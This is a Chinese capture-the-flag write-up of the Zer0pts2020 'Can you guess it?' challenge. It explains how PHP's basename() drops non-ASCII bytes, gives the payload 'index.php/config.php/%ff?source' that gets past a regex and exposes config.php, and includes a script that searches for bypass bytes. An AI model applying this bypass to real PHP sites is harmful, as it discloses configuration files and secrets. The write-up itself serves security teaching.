[PHP知识库] [Zer0pts2020]Can you guess it?

开发: C++知识库 Java知识库 JavaScript Python PHP知识库人工智能区块链大数据移动开发嵌入式开发工具数据结构与算法开发测试游戏开发网络协议系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑笔记本显卡显示器固态硬盘硬盘耳机手机 iphone vivo oppo 小米华为单反装机图拉丁

-> PHP知识库 -> [Zer0pts2020]Can you guess it? -> 正文阅读

[PHP知识库][Zer0pts2020]Can you guess it?

知识点：绕过正则，$_SERVER[‘PHP_SELF’]，basename()，不可显字符绕过正则

文章目录

需要了解的知识

1. $_SERVER[‘PHP_SELF’]

表示当前的php文件相对于网站根目录的位置地址，在本地复现
在这里插入图片描述

2. basename()

会返回路径重的文件名部分。比如/index.php/config.php使用basename()之后返回config.php。
basename()会去掉文件名开头的非ASCII值。

var_dump(basename("xffconfig.php")); // => config.php
var_dump(basename("config.php/xff")); // => config.php

这里实验一下：

<?php

include 'config.php';
echo $_SERVER['PHP_SELF']."<br>";
var_dump(basename($_SERVER['PHP_SELF']));

在这里插入图片描述

3. 不可显字符绕过正则

if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) {
    echo "可以通过不可显字符绕过"."<br>";
  }
if (preg_match('/config\.php\//i', $_SERVER['PHP_SELF'])) {
    echo "专门过滤config/"."<br>";
  }

上面两个正则匹配是不一样的，第一个是匹配尾部，第二个是匹配config/字符串。
匹配尾部的可以通过不可显字符绕过，比如%ff

解题过程

有了上面的知识基础，就可以来解决这个题目
打开容器，进行代码审计

在这里插入图片描述

 <?php
include 'config.php'; // FLAG is defined in config.php

if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) {
  exit("I don't know what you are thinking, but I won't let you read it :)");
}

if (isset($_GET['source'])) {
  highlight_file(basename($_SERVER['PHP_SELF']));
  exit();
}

$secret = bin2hex(random_bytes(64));
if (isset($_POST['guess'])) {
  $guess = (string) $_POST['guess'];
  if (hash_equals($secret, $guess)) {
    $message = 'Congratulations! The flag is: ' . FLAG;
  } else {
    $message = 'Wrong.';
  }
}
?>
<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>Can you guess it?</title>
  </head>
  <body>
    <h1>Can you guess it?</h1>
    <p>If your guess is correct, I'll give you the flag.</p>
    <p><a href="?source">Source</a></p>
    <hr>
<?php if (isset($message)) { ?>
    <p><?= $message ?></p>
<?php } ?>
    <form action="index.php" method="POST">
      <input type="text" name="guess">
      <input type="submit">
    </form>
  </body>
</html>

思路：根据提示，我们知道flag在config.php中，可以通过highlight_file(basename($_SERVER['PHP_SELF']));来显示config.php；下面的代码这里有点迷惑性，$message = 'Congratulations! The flag is: ' . FLAG;，但是在这之前要满足随机数什么的，难度有点大，所以不选择这个方法。

payload:

index.php/config.php/%ff?source

既满足preg_match，也满足basename($_SERVER['PHP_SELF'])回显是config.php，同时后端的%ff?source也满足isset的需要

在这里插入图片描述另外贴一下寻找可用的不可见字符的脚本，来源：脚本来源

<?php
function check($str){
    return preg_match('/config\.php\/*$/i', $str);
}
for ($i = 0; $i < 255; $i++){
    $s = '/index.php/config.php/'.chr($i);
    if(!check($s)){
        $t = basename('/index.php/config.php/'.chr($i));
        echo "${i}: ${t}\n";
    }
}
?>